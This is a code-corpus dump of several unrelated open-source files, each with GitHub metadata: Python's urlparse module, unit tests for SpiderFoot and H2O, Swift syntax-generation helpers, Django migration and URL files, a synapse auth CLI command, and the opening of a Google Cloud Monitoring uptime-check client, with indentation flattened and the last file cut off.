def urljoin(base, url, allow_fragments=True):
"""Join a base URL and a possibly relative URL to form an absolute
interpretation of the latter."""
if not base:
return url
if not url:
return base
bscheme, bnetloc, bpath, bparams, bquery, bfragment = \
urlparse(base, '', allow_fragments)
scheme, netloc, path, params, query, fragment = \
urlparse(url, bscheme, allow_fragments)
if scheme != bscheme or scheme not in uses_relative:
return url
if scheme in uses_netloc:
if netloc:
return urlunparse((scheme, netloc, path,
params, query, fragment))
netloc = bnetloc
if path[:1] == '/':
return urlunparse((scheme, netloc, path,
params, query, fragment))
if not path:
path = bpath
if not params:
params = bparams
else:
path = path[:-1]
return urlunparse((scheme, netloc, path,
params, query, fragment))
if not query:
query = bquery
return urlunparse((scheme, netloc, path,
params, query, fragment))
segments = bpath.split('/')[:-1] + path.split('/')
# XXX The stuff below is bogus in various ways...
if segments[-1] == '.':
segments[-1] = ''
while '.' in segments:
segments.remove('.')
while 1:
i = 1
n = len(segments) - 1
while i < n:
if (segments[i] == '..'
and segments[i-1] not in ('', '..')):
del segments[i-1:i+1]
break
i = i+1
else:
break
if segments == ['', '..']:
segments[-1] = ''
elif len(segments) >= 2 and segments[-1] == '..':
segments[-2:] = ['']
return urlunparse((scheme, netloc, '/'.join(segments),
params, query, fragment))
def urldefrag(url):
"""Removes any existing fragment from URL.
Returns a tuple of the defragmented URL and the fragment. If
the URL contained no fragments, the second element is the
empty string.
"""
if '#' in url:
s, n, p, a, q, frag = urlparse(url)
defrag = urlunparse((s, n, p, a, q, ''))
return defrag, frag
else:
return url, ''
# unquote method for parse_qs and parse_qsl
# Cannot use directly from urllib as it would create circular reference.
# urllib uses urlparse methods ( urljoin)
_hextochr = dict(('%02x' % i, chr(i)) for i in range(256))
_hextochr.update(('%02X' % i, chr(i)) for i in range(256))
def unquote(s):
"""unquote('abc%20def') -> 'abc def'."""
res = s.split('%')
for i in xrange(1, len(res)):
item = res[i]
try:
res[i] = _hextochr[item[:2]] + item[2:]
except KeyError:
res[i] = '%' + item
except UnicodeDecodeError:
res[i] = unichr(int(item[:2], 16)) + item[2:]
return "".join(res)
def parse_qs(qs, keep_blank_values=0, strict_parsing=0):
"""Parse a query given as a string argument.
Arguments:
qs: URL-encoded query string to be parsed
keep_blank_values: flag indicating whether blank values in
URL encoded queries should be treated as blank strings.
A true value indicates that blanks should be retained as
blank strings. The default false value indicates that
blank values are to be ignored and treated as if they were
not included.
strict_parsing: flag indicating what to do with parsing errors.
If false (the default), errors are silently ignored.
If true, errors raise a ValueError exception.
"""
dict = {}
for name, value in parse_qsl(qs, keep_blank_values, strict_parsing):
if name in dict:
dict[name].append(value)
else:
dict[name] = [value]
return dict
def parse_qsl(qs, keep_blank_values=0, strict_parsing=0):
"""Parse a query given as a string argument.
Arguments:
qs: URL-encoded query string to be parsed
keep_blank_values: flag indicating whether blank values in
URL encoded queries should be treated as blank strings. A
true value indicates that blanks should be retained as blank
strings. The default false value indicates that blank values
are to be ignored and treated as if they were not included.
strict_parsing: flag indicating what to do with parsing errors. If
false (the default), errors are silently ignored. If true,
errors raise a ValueError exception.
Returns a list, as G-d intended.
"""
pairs = [s2 for s1 in qs.split('&') for s2 in s1.split(';')]
r = []
for name_value in pairs:
if not name_value and not strict_parsing:
continue
nv = name_value.split('=', 1)
if len(nv) != 2:
if strict_parsing:
raise ValueError, "bad query field: %r" % (name_value,)
# Handle case of a control-name with no equal sign
if keep_blank_values:
nv.append('')
else:
continue
if len(nv[1]) or keep_blank_values:
name = unquote(nv[0].replace('+', ' '))
value = unquote(nv[1].replace('+', ' '))
r.append((name, value))
return r
test_input = """
http://a/b/c/d
g:h = <URL:g:h>
http:g = <URL:http://a/b/c/g>
http: = <URL:http://a/b/c/d>
g = <URL:http://a/b/c/g>
./g = <URL:http://a/b/c/g>
g/ = <URL:http://a/b/c/g/>
/g = <URL:http://a/g>
//g = <URL:http://g>
?y = <URL:http://a/b/c/d?y>
g?y = <URL:http://a/b/c/g?y>
g?y/./x = <URL:http://a/b/c/g?y/./x>
. = <URL:http://a/b/c/>
./ = <URL:http://a/b/c/>
.. = <URL:http://a/b/>
../ = <URL:http://a/b/>
../g = <URL:http://a/b/g>
../.. = <URL:http://a/>
../../g = <URL:http://a/g>
../../../g = <URL:http://a/../g>
./../g = <URL:http://a/b/g>
./g/. = <URL:http://a/b/c/g/>
/./g = <URL:http://a/./g>
g/./h = <URL:http://a/b/c/g/h>
g/../h = <URL:http://a/b/c/h>
http:g = <URL:http://a/b/c/g>
http: = <URL:http://a/b/c/d>
http:?y = <URL:http://a/b/c/d?y>
http:g?y = <URL:http://a/b/c/g?y>
http:g?y/./x = <URL:http://a/b/c/g?y/./x>
"""
def test():
import sys
base = ''
if sys.argv[1:]:
fn = sys.argv[1]
if fn == '-':
fp = sys.stdin
else:
fp = open(fn)
else:
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
fp = StringIO(test_input)
for line in fp:
words = line.split()
if not words:
continue
url = words[0]
parts = urlparse(url)
print '%-10s : %s' % (url, parts)
abs = urljoin(base, url)
if not base:
base = abs
wrapped = '<URL:%s>' % abs
print '%-10s = %s' % (url, wrapped)
if len(words) == 3 and words[1] == '=':
if wrapped != words[2]:
print 'EXPECTED', words[2], '!!!!!!!!!!'
if __name__ == '__main__':
test()
| {
"content_hash": "e7e66e5c69ed41a105cc506d5b7c25f5",
"timestamp": "",
"source": "github",
"line_count": 423,
"max_line_length": 102,
"avg_line_length": 35.13002364066194,
"alnum_prop": 0.5116419919246299,
"repo_name": "chvrga/outdoor-explorer",
"id": "2c982d5a6a66a1e9278ab5aaad7dec09798ad317",
"size": "14860",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "java/play-1.4.4/python/Lib/urlparse.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "4720"
},
{
"name": "C",
"bytes": "76128"
},
{
"name": "C++",
"bytes": "31284"
},
{
"name": "CSS",
"bytes": "107401"
},
{
"name": "HTML",
"bytes": "1754737"
},
{
"name": "Java",
"bytes": "2441299"
},
{
"name": "JavaScript",
"bytes": "1405163"
},
{
"name": "PLpgSQL",
"bytes": "1377"
},
{
"name": "Python",
"bytes": "8991412"
},
{
"name": "Ruby",
"bytes": "295601"
},
{
"name": "Shell",
"bytes": "7499"
},
{
"name": "XQuery",
"bytes": "544017"
},
{
"name": "XSLT",
"bytes": "1099"
}
],
"symlink_target": ""
} |
import pytest
import unittest
from modules.sfp_spamhaus import sfp_spamhaus
from sflib import SpiderFoot
@pytest.mark.usefixtures
class TestModuleSpamhaus(unittest.TestCase):
def test_opts(self):
module = sfp_spamhaus()
self.assertEqual(len(module.opts), len(module.optdescs))
def test_setup(self):
sf = SpiderFoot(self.default_options)
module = sfp_spamhaus()
module.setup(sf, dict())
def test_watchedEvents_should_return_list(self):
module = sfp_spamhaus()
self.assertIsInstance(module.watchedEvents(), list)
def test_producedEvents_should_return_list(self):
module = sfp_spamhaus()
self.assertIsInstance(module.producedEvents(), list)
| {
"content_hash": "4a157b02117cd1603967da024fd15fe4",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 64,
"avg_line_length": 28.192307692307693,
"alnum_prop": 0.694406548431105,
"repo_name": "smicallef/spiderfoot",
"id": "9d551be9b0dfa524c208ae060e0a2cd95d572c27",
"size": "733",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/unit/modules/test_sfp_spamhaus.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "9833"
},
{
"name": "Dockerfile",
"bytes": "2779"
},
{
"name": "JavaScript",
"bytes": "34248"
},
{
"name": "Python",
"bytes": "2845553"
},
{
"name": "RobotFramework",
"bytes": "7584"
},
{
"name": "Shell",
"bytes": "1636"
}
],
"symlink_target": ""
} |
import textwrap
from AttributeNodes import ATTRIBUTE_NODES
from AvailabilityNodes import AVAILABILITY_NODES
from CommonNodes import COMMON_NODES # noqa: I201
from DeclNodes import DECL_NODES # noqa: I201
from ExprNodes import EXPR_NODES # noqa: I201
from GenericNodes import GENERIC_NODES # noqa: I201
from PatternNodes import PATTERN_NODES # noqa: I201
from StmtNodes import STMT_NODES # noqa: I201
import Token
from TypeNodes import TYPE_NODES # noqa: I201
# Re-export global constants
SYNTAX_NODES = COMMON_NODES + EXPR_NODES + DECL_NODES + ATTRIBUTE_NODES + \
STMT_NODES + GENERIC_NODES + TYPE_NODES + PATTERN_NODES + \
AVAILABILITY_NODES
SYNTAX_TOKENS = Token.SYNTAX_TOKENS
SYNTAX_TOKEN_MAP = Token.SYNTAX_TOKEN_MAP
def make_missing_child(child):
"""
Generates a C++ call to make the raw syntax for a given Child object.
"""
if child.is_token():
token = child.main_token()
tok_kind = token.kind if token else "unknown"
tok_text = token.text if token else ""
return 'RawSyntax::missing(tok::%s, "%s")' % (tok_kind, tok_text)
else:
missing_kind = "Unknown" if child.syntax_kind == "Syntax" \
else child.syntax_kind
if child.node_choices:
return make_missing_child(child.node_choices[0])
return 'RawSyntax::missing(SyntaxKind::%s)' % missing_kind
def check_child_condition_raw(child):
"""
Generates a C++ closure to check whether a given raw syntax node can
satisfy the requirements of child.
"""
result = '[](const RC<RawSyntax> &Raw) {\n'
result += ' // check %s\n' % child.name
if child.token_choices:
result += 'if (!Raw->isToken()) return false;\n'
result += 'auto TokKind = Raw->getTokenKind();\n'
tok_checks = []
for choice in child.token_choices:
tok_checks.append("TokKind == tok::%s" % choice.kind)
result += 'return %s;\n' % (' || '.join(tok_checks))
elif child.text_choices:
result += 'if (!Raw->isToken()) return false;\n'
result += 'auto Text = Raw->getTokenText();\n'
tok_checks = []
for choice in child.text_choices:
tok_checks.append('Text == "%s"' % choice)
result += 'return %s;\n' % (' || '.join(tok_checks))
elif child.node_choices:
node_checks = []
for choice in child.node_choices:
node_checks.append(check_child_condition_raw(choice) + '(Raw)')
result += 'return %s;\n' % ((' || ').join(node_checks))
else:
result += 'return %s::kindof(Raw->getKind());' % child.type_name
result += '}'
return result
def make_missing_swift_child(child):
"""
Generates a Swift call to make the raw syntax for a given Child object.
"""
if child.is_token():
token = child.main_token()
tok_kind = token.swift_kind() if token else "unknown"
if not token or not token.text:
tok_kind += '("")'
return 'RawSyntax.missingToken(.%s)' % tok_kind
else:
missing_kind = "unknown" if child.syntax_kind == "Syntax" \
else child.swift_syntax_kind
return 'RawSyntax.missing(.%s)' % missing_kind
def create_node_map():
"""
Creates a lookup table to find nodes by their kind.
"""
return {node.syntax_kind: node for node in SYNTAX_NODES}
def is_visitable(node):
return not node.is_base()
def dedented_lines(description):
"""
Each line of the provided string with leading whitespace stripped.
"""
if not description:
return []
return textwrap.dedent(description).split('\n')
| {
"content_hash": "109c1b61f2c1482eec05830586e84af4",
"timestamp": "",
"source": "github",
"line_count": 104,
"max_line_length": 75,
"avg_line_length": 35.08653846153846,
"alnum_prop": 0.6207180049328583,
"repo_name": "huonw/swift",
"id": "9aba6ef6642f9a39641ddcca161de7db30e09b55",
"size": "3649",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "utils/gyb_syntax_support/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "34"
},
{
"name": "C",
"bytes": "200369"
},
{
"name": "C++",
"bytes": "29277385"
},
{
"name": "CMake",
"bytes": "462532"
},
{
"name": "D",
"bytes": "1107"
},
{
"name": "DTrace",
"bytes": "2438"
},
{
"name": "Emacs Lisp",
"bytes": "57358"
},
{
"name": "LLVM",
"bytes": "67650"
},
{
"name": "Makefile",
"bytes": "1841"
},
{
"name": "Objective-C",
"bytes": "369708"
},
{
"name": "Objective-C++",
"bytes": "232830"
},
{
"name": "Perl",
"bytes": "2211"
},
{
"name": "Python",
"bytes": "1180644"
},
{
"name": "Ruby",
"bytes": "2091"
},
{
"name": "Shell",
"bytes": "206022"
},
{
"name": "Swift",
"bytes": "24216920"
},
{
"name": "Vim script",
"bytes": "15654"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import image_cropping.fields
class Migration(migrations.Migration):
dependencies = [
('markets', '0061_auto_20170510_0748'),
]
operations = [
migrations.CreateModel(
name='Language',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, unique=True)),
],
options={
'ordering': ('name',),
},
),
migrations.AlterField(
model_name='logo',
name='cropping',
field=image_cropping.fields.ImageRatioField(
'image', '400x302', adapt_rotation=False, allow_fullsize=False,
hide_image_field=False, size_warning=False, verbose_name='cropping',
free_crop=False, help_text='Use cropping tool to cut the image to the right format. Always leave\
enough white space around the edges and try to keep the largest possible size for good image quality.',
),
),
migrations.AlterField(
model_name='logo',
name='image',
field=models.ImageField(
null=True, upload_to='',
help_text="After choosing an image to upload click 'Save' to access the 'Cropping' tool and edit the\
image"),
),
migrations.AddField(
model_name='market',
name='language',
field=models.ForeignKey(
blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
to='markets.Language', verbose_name='Language of Marketplace'),
),
migrations.AddField(
model_name='publishedmarket',
name='language',
field=models.ForeignKey(
blank=True, null=True, on_delete=django.db.models.deletion.CASCADE,
to='markets.Language', verbose_name='Language of Marketplace'),
),
]
| {
"content_hash": "5c3390d52233eeab66a6216e5bb5dd89",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 119,
"avg_line_length": 38.01754385964912,
"alnum_prop": 0.5657591139824643,
"repo_name": "uktrade/navigator",
"id": "1a14036622950d49fe07d42152d3df9214e13b5a",
"size": "2240",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "app/markets/migrations/0062_auto_20170726_1512.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "143"
},
{
"name": "HTML",
"bytes": "55604"
},
{
"name": "JavaScript",
"bytes": "53405"
},
{
"name": "Makefile",
"bytes": "4355"
},
{
"name": "Procfile",
"bytes": "181"
},
{
"name": "Python",
"bytes": "243097"
},
{
"name": "SCSS",
"bytes": "125647"
},
{
"name": "Shell",
"bytes": "5758"
}
],
"symlink_target": ""
} |
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'gnucash_explorer.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^admin/', include(admin.site.urls)),
)
| {
"content_hash": "419ab5a5a4121a6d03726afb03557278",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 61,
"avg_line_length": 25.583333333333332,
"alnum_prop": 0.6579804560260586,
"repo_name": "peap/gnucash_explorer",
"id": "48882ee073a3b098ed0a6218bd4137c9ba43bb3e",
"size": "307",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "gnucash_explorer/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "4589"
}
],
"symlink_target": ""
} |
from __future__ import print_function
from builtins import range
import sys
sys.path.insert(1,"../../../")
import h2o
from h2o.grid.grid_search import H2OGridSearch
from h2o.estimators.glm import H2OGeneralizedLinearEstimator
from tests import pyunit_utils
def benign_grid():
training_data = h2o.import_file(pyunit_utils.locate("smalldata/logreg/benign.csv"))
Y = 3
X = [4,5,6,7,8,9,10,11]
# NOTE: this tests bad parameter value handling; 'a' is not a float:
hyper_parameters = {'alpha': [0.01,0.3,0.5,'a'], 'lambda': [1e-5,1e-6,1e-7,1e-8]}
gs = H2OGridSearch(H2OGeneralizedLinearEstimator(family='binomial'), hyper_parameters)
gs.train(x=X,y=Y, training_frame=training_data)
for model in gs:
assert isinstance(model, H2OGeneralizedLinearEstimator)
gs.show()
print(gs.get_grid(sort_by='F1', decreasing=True))
best_model_id = gs.get_grid(sort_by='F1', decreasing=True).model_ids[0]
best_model = h2o.get_model(best_model_id)
best_model.predict(training_data)
gs.predict(training_data)
print(gs.get_hyperparams(best_model_id))
print(gs.grid_id)
assert best_model.params['family']['actual'] == 'binomial'
# test search_criteria plumbing and max_models
search_criteria = { 'strategy': "RandomDiscrete", 'max_models': 3 }
max_models_g = H2OGridSearch(H2OGeneralizedLinearEstimator(family='binomial'), hyper_parameters, search_criteria=search_criteria)
max_models_g.train(x=X,y=Y, training_frame=training_data)
max_models_g.show()
print(max_models_g.grid_id)
print(max_models_g.get_grid(sort_by='F1', decreasing=True))
assert len(max_models_g.models) == 3, "expected 3 models, got: {}".format(len(max_models_g.models))
print(max_models_g.sorted_metric_table())
# test search_criteria plumbing and asymptotic stopping
search_criteria = { 'strategy': "RandomDiscrete", 'seed': 42, 'stopping_metric': "AUTO", 'stopping_tolerance': 0.1, 'stopping_rounds': 2 }
asymp_g = H2OGridSearch(H2OGeneralizedLinearEstimator(family='binomial', nfolds=5), hyper_parameters, search_criteria=search_criteria)
asymp_g.train(x=X,y=Y, training_frame=training_data)
asymp_g.show()
print(asymp_g.grid_id)
print(asymp_g.get_grid(sort_by='F1', decreasing=True))
assert len(asymp_g.models) == 5, "expected 5 models, got: {}".format(len(asymp_g.models))
if __name__ == "__main__":
pyunit_utils.standalone_test(benign_grid)
else:
benign_grid()
| {
"content_hash": "b802ebbda953e56c9d00e92661a5294a",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 140,
"avg_line_length": 39.95,
"alnum_prop": 0.7175636211931581,
"repo_name": "h2oai/h2o-3",
"id": "5fd14d0f83e650ee8c6a96a5e879b6d5275567be",
"size": "2397",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "h2o-py/tests/testdir_algos/glm/pyunit_benign_glm_grid.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "12803"
},
{
"name": "CSS",
"bytes": "882321"
},
{
"name": "CoffeeScript",
"bytes": "7550"
},
{
"name": "DIGITAL Command Language",
"bytes": "106"
},
{
"name": "Dockerfile",
"bytes": "10459"
},
{
"name": "Emacs Lisp",
"bytes": "2226"
},
{
"name": "Groovy",
"bytes": "205646"
},
{
"name": "HCL",
"bytes": "36232"
},
{
"name": "HTML",
"bytes": "8018117"
},
{
"name": "HiveQL",
"bytes": "3985"
},
{
"name": "Java",
"bytes": "15981357"
},
{
"name": "JavaScript",
"bytes": "148426"
},
{
"name": "Jupyter Notebook",
"bytes": "20638329"
},
{
"name": "Makefile",
"bytes": "46043"
},
{
"name": "PHP",
"bytes": "800"
},
{
"name": "Python",
"bytes": "8188608"
},
{
"name": "R",
"bytes": "4149977"
},
{
"name": "Ruby",
"bytes": "64"
},
{
"name": "Sass",
"bytes": "23790"
},
{
"name": "Scala",
"bytes": "4845"
},
{
"name": "Shell",
"bytes": "214495"
},
{
"name": "Smarty",
"bytes": "1792"
},
{
"name": "TeX",
"bytes": "554940"
}
],
"symlink_target": ""
} |
import json
import pprint
import shutil
import synapse.exc as s_exc
import synapse.common as s_common
import synapse.cores.common as s_cores_commmon
import synapse.lib.cli as s_cli
import synapse.lib.auth as s_auth
import synapse.lib.tufo as s_tufo
class AuthCmd(s_cli.Cmd):
'''
Helper for managing AuthMixin instances.
Examples:
# Get users
auth
# Get roles
auth --type role
# Get a specific user
auth --name root@localhost
# Make a user
auth --act add --name user@localhost
# Add a rule to a user
auth --act add --name user@localhost --rule node:tag:add --tag *
# Make a role
auth --act add --name creators --type role
# Add a rule to a role
auth --act add --name creators --type role --rule node:add --form strform
# Get a specific role details
auth --type role --name creators
# Grant a user a role
auth --act add --name user@localhost --role creators
# Grant a user admin
auth --act add --name user@localhost --admin
# Remove admin from a user
auth --act del --name user@localhost --admin
# Remove a role from a user
auth --act del --name user@localhost --role creators
# Remove a rule from a role
auth --act del --name creators --type role --rule node:add --form strform
# Remove a rule from a user
auth --act del --name user@localhost --rule node:tag:add --tag *
# Delete a role
auth --act del --name creators --type role
# Delete a user
auth --act del --name user@localhost
'''
_cmd_name = 'auth'
_cmd_syntax = (
('--act', {'type': 'enum',
'defval': 'get',
'enum:vals': ('add', 'del', 'get')}),
('--type', {'type': 'enum',
'defval': 'user',
'enum:vals': ('user', 'role')}),
('--name', {'type': 'valu'}),
('--rule', {'type': 'valu'}),
('--form', {'type': 'valu'}),
('--prop', {'type': 'valu'}),
('--tag', {'type': 'valu'}),
('--role', {'type': 'valu'}),
('--admin', {}),
('--json', {})
)
getmap = {'user': 'users',
'role': 'roles'}
typmap = {'user': 'user',
'role': 'role'}
modmap = {'user': 'urule',
'role': 'rrule'}
def __init__(self, cli, **opts):
s_cli.Cmd.__init__(self, cli, **opts)
s = '\n '.join([str(stx) for stx in self._cmd_syntax])
self.__doc__ = '\n '.join([self.__doc__, 'Command Syntax:\n', s])
def formRulefo(self, opts):
rtype = opts.pop('rule', None)
if not rtype:
return None
form = opts.get('form')
prop = opts.get('prop')
tag = opts.get('tag')
if tag:
if form or prop:
raise s_exc.BadSyntaxError(mesg='Cannot form rulefo with tag and (form OR prop)')
else:
return s_tufo.tufo(rtype, tag=tag)
if form and prop:
return s_tufo.tufo(rtype, form=form, prop=prop)
if form and not prop:
return s_tufo.tufo(rtype, form=form)
raise s_exc.BadSyntaxError(mesg='Unable to form rulefo',
prop=prop, form=form, tag=tag, rule=rtype)
def getMsg(self, stub, name, typ, opts):
if not name:
raise s_exc.BadSyntaxError(mesg='Action requires a name')
args = {typ: name}
admin = opts.pop('admin', None)
if admin and typ == 'user':
msg = s_tufo.tufo(':'.join([stub, 'admin']),
**args)
return msg
role = opts.pop('role', None)
if role and typ == 'user':
args['role'] = role
msg = s_tufo.tufo(':'.join([stub, 'urole']),
**args)
return msg
rulefo = self.formRulefo(opts)
if rulefo is None:
msg = s_tufo.tufo(':'.join([stub, typ]),
**args)
return msg
mod = self.modmap.get(typ)
if not mod: # pragma: no cover
raise s_exc.BadSyntaxError(mesg='Unknown type encountered',
type=typ)
args['rule'] = rulefo
msg = s_tufo.tufo(':'.join([stub, mod]),
**args)
return msg
def runCmdOpts(self, opts):
core = self.getCmdItem() # type: s_auth.AuthMixin
act = opts.pop('act')
typ = opts.pop('type')
name = opts.pop('name', None)
astub = 'auth:add'
dstub = 'auth:del'
# Form our mesg
if act == 'get':
if name:
mesg = s_tufo.tufo('auth:req:%s' % typ,
**{self.typmap.get(typ): name})
else:
mesg = ('auth:get:%s' % self.getmap.get(typ),
{})
elif act == 'add':
mesg = self.getMsg(astub, name, typ, opts)
elif act == 'del':
mesg = self.getMsg(dstub, name, typ, opts)
else: # pragma: no cover
raise s_exc.BadSyntaxError(mesg='Unknown action provided',
act=act)
# Execute remote call
isok, retn = core.authReact(mesg)
retn = s_common.reqok(isok, retn)
# Format output
if opts.get('json'):
outp = json.dumps(retn, indent=2, sort_keys=True)
else:
width, _ = shutil.get_terminal_size((120, 24))
if width == 0:
# In CI we may not have a tty available.
width = 120
outp = pprint.pformat(retn, width=width)
self.printf(outp)
return retn
| {
"content_hash": "ca73f7d16ae01c7b2fbf16131bb3b7e9",
"timestamp": "",
"source": "github",
"line_count": 168,
"max_line_length": 97,
"avg_line_length": 34.851190476190474,
"alnum_prop": 0.4883005977796755,
"repo_name": "vivisect/synapse",
"id": "d64d0b849d0d859b3766ee343c3bb834ba629390",
"size": "5855",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "synapse/cmds/auth.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "716598"
}
],
"symlink_target": ""
} |
"""Accesses the google.monitoring.v3 UptimeCheckService API."""
import functools
import pkg_resources
import warnings
from google.oauth2 import service_account
import google.api_core.client_options
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.gapic_v1.routing_header
import google.api_core.grpc_helpers
import google.api_core.page_iterator
import google.api_core.path_template
import grpc
from google.api import metric_pb2 as api_metric_pb2
from google.api import monitored_resource_pb2
from google.cloud.monitoring_v3.gapic import enums
from google.cloud.monitoring_v3.gapic import uptime_check_service_client_config
from google.cloud.monitoring_v3.gapic.transports import (
uptime_check_service_grpc_transport,
)
from google.cloud.monitoring_v3.proto import alert_pb2
from google.cloud.monitoring_v3.proto import alert_service_pb2
from google.cloud.monitoring_v3.proto import alert_service_pb2_grpc
from google.cloud.monitoring_v3.proto import common_pb2
from google.cloud.monitoring_v3.proto import group_pb2
from google.cloud.monitoring_v3.proto import group_service_pb2
from google.cloud.monitoring_v3.proto import group_service_pb2_grpc
from google.cloud.monitoring_v3.proto import metric_pb2 as proto_metric_pb2
from google.cloud.monitoring_v3.proto import metric_service_pb2
from google.cloud.monitoring_v3.proto import metric_service_pb2_grpc
from google.cloud.monitoring_v3.proto import notification_pb2
from google.cloud.monitoring_v3.proto import notification_service_pb2
from google.cloud.monitoring_v3.proto import notification_service_pb2_grpc
from google.cloud.monitoring_v3.proto import service_pb2
from google.cloud.monitoring_v3.proto import service_service_pb2
from google.cloud.monitoring_v3.proto import service_service_pb2_grpc
from google.cloud.monitoring_v3.proto import uptime_pb2
from google.cloud.monitoring_v3.proto import uptime_service_pb2
from google.cloud.monitoring_v3.proto import uptime_service_pb2_grpc
from google.protobuf import empty_pb2
from google.protobuf import field_mask_pb2
from google.protobuf import timestamp_pb2
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution(
"google-cloud-monitoring",
).version
class UptimeCheckServiceClient(object):
"""
The UptimeCheckService API is used to manage (list, create, delete,
edit) Uptime check configurations in the Stackdriver Monitoring product.
An Uptime check is a piece of configuration that determines which
resources and services to monitor for availability. These configurations
can also be configured interactively by navigating to the [Cloud
Console] (http://console.cloud.google.com), selecting the appropriate
project, clicking on "Monitoring" on the left-hand side to navigate to
Stackdriver, and then clicking on "Uptime".
"""
SERVICE_ADDRESS = "monitoring.googleapis.com:443"
"""The default address of the service."""
# The name of the interface for this client. This is the key used to
# find the method configuration in the client_config dictionary.
_INTERFACE_NAME = "google.monitoring.v3.UptimeCheckService"
@classmethod
def from_service_account_file(cls, filename, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
UptimeCheckServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@classmethod
def project_path(cls, project):
"""DEPRECATED. Return a fully-qualified project string."""
warnings.warn(
"Resource name helper functions are deprecated.",
PendingDeprecationWarning,
stacklevel=1,
)
return google.api_core.path_template.expand(
"projects/{project}", project=project,
)
@classmethod
def uptime_check_config_path(cls, project, uptime_check_config):
"""DEPRECATED. Return a fully-qualified uptime_check_config string."""
warnings.warn(
"Resource name helper functions are deprecated.",
PendingDeprecationWarning,
stacklevel=1,
)
return google.api_core.path_template.expand(
"projects/{project}/uptimeCheckConfigs/{uptime_check_config}",
project=project,
uptime_check_config=uptime_check_config,
)
def __init__(
self,
transport=None,
channel=None,
credentials=None,
client_config=None,
client_info=None,
client_options=None,
):
"""Constructor.
Args:
transport (Union[~.UptimeCheckServiceGrpcTransport,
Callable[[~.Credentials, type], ~.UptimeCheckServiceGrpcTransport]): A transport
instance, responsible for actually making the API calls.
The default transport uses the gRPC protocol.
This argument may also be a callable which returns a
transport instance. Callables will be sent the credentials
as the first argument and the default transport class as
the second argument.
channel (grpc.Channel): DEPRECATED. A ``Channel`` instance
through which to make calls. This argument is mutually exclusive
with ``credentials``; providing both will raise an exception.
credentials (google.auth.credentials.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is mutually exclusive with providing a
transport instance to ``transport``; doing so will raise
an exception.
client_config (dict): DEPRECATED. A dictionary of call options for
each method. If not specified, the default configuration is used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
client_options (Union[dict, google.api_core.client_options.ClientOptions]):
Client options used to set user options on the client. API Endpoint
should be set through client_options.
"""
# Raise deprecation warnings for things we want to go away.
if client_config is not None:
warnings.warn(
"The `client_config` argument is deprecated.",
PendingDeprecationWarning,
stacklevel=2,
)
else:
client_config = uptime_check_service_client_config.config
if channel:
warnings.warn(
"The `channel` argument is deprecated; use " "`transport` instead.",
PendingDeprecationWarning,
stacklevel=2,
)
api_endpoint = self.SERVICE_ADDRESS
if client_options:
if type(client_options) == dict:
client_options = google.api_core.client_options.from_dict(
client_options
)
if client_options.api_endpoint:
api_endpoint = client_options.api_endpoint
# Instantiate the transport.
# The transport is responsible for handling serialization and
# deserialization and actually sending data to the service.
if transport:
if callable(transport):
self.transport = transport(
credentials=credentials,
default_class=uptime_check_service_grpc_transport.UptimeCheckServiceGrpcTransport,
address=api_endpoint,
)
else:
if credentials:
raise ValueError(
"Received both a transport instance and "
"credentials; these are mutually exclusive."
)
self.transport = transport
else:
self.transport = uptime_check_service_grpc_transport.UptimeCheckServiceGrpcTransport(
address=api_endpoint, channel=channel, credentials=credentials,
)
if client_info is None:
client_info = google.api_core.gapic_v1.client_info.ClientInfo(
gapic_version=_GAPIC_LIBRARY_VERSION,
)
else:
client_info.gapic_version = _GAPIC_LIBRARY_VERSION
self._client_info = client_info
# Parse out the default settings for retry and timeout for each RPC
# from the client configuration.
# (Ordinarily, these are the defaults specified in the `*_config.py`
# file next to this one.)
self._method_configs = google.api_core.gapic_v1.config.parse_method_configs(
client_config["interfaces"][self._INTERFACE_NAME],
)
# Save a dictionary of cached API call functions.
# These are the actual callables which invoke the proper
# transport methods, wrapped with `wrap_method` to add retry,
# timeout, and the like.
self._inner_api_calls = {}
# Service calls
def list_uptime_check_configs(
self,
parent,
page_size=None,
